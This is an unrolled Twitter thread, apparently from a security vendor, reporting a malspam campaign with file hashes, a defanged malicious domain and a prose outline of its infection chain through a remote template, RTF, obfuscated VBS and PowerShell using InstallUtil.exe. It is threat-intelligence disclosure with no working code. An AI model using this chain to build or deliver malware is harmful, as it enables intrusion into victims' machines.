#malspam detected in-the-wild by @BitDamSecurity

sha1: 1bcd89984728250924bb51d01550a79819512d6d
missed by O365 ATP(TTD:8h)
Live: https://bitdam.com/email_blind_spots_study/

#ThreatIntel #infosec #IOC
docx has a rels getting a "wbk" file from http://office-archive-index[.]com. The wbk is actually an rtf. The website is still active btw.
RTF file (43d930ddf0af21abde85d14d70c689599b8954ad) execute a powershell to run putin.vbs. The vbs is heavily obfuscated
vbs is downloading attack.jpg, which is a very long string, which decodes into a powershell command that installs the malware using InstallUtil.exe.
You can follow @bit_dam.
Tip: mention @twtextapp on a Twitter thread with the keyword “unroll” to get a link to it.

Latest Threads Unrolled: